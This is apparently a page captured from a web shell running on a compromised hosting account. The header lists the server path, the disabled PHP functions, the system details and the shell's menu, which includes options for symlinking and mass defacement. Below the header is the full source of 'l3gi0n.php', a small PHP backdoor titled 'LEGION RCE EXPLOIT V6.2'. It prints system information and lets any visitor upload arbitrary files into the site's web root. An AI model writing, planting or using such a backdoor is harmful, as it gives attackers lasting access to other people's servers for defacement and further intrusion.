
| Path : /home/gujo45me/public_html/lastra/ |
| Disable Functions : exec,passthru,shell_exec,system System : Linux server-604606.appsiete.com 3.10.0-1160.119.1.el7.tuxcare.els25.x86_64 #1 SMP Wed Oct 1 17:37:27 UTC 2025 x86_64 [ Home ][ Zone-h ][ Jumping ][ Symlink ][ Mass Depes ][ Command ] |
| Current File : /home/gujo45me/public_html/lastra/l3gi0n.php |
<?php
echo '<center><h1><font size="7" color="#66ffff">LEGION RCE EXPLOIT V6.2</font></h1></center>';
echo '<b><font size="4" color="#ff9933">['.php_uname().']</font></b><br><br>';
echo '<form method="post" enctype="multipart/form-data">';
echo '<input type="file" name="file">';
echo '<input name="_upl" type="submit" value="Upload"></form>';
$root = $_SERVER['DOCUMENT_ROOT'];
$file = $_FILES['file']['name'];
$dest = $root . '/' . $file;
if ($_POST['_upl'] === 'Upload') {
if (@copy($_FILES['file']['tmp_name'], $dest)) {
echo 'LEGION Exploit Success! -> <a href="' . $file . '" target="_blank"><b><u>' . $file . '</u></b></a>';
} else {
echo '<b>Upload failed.</b>';
}
}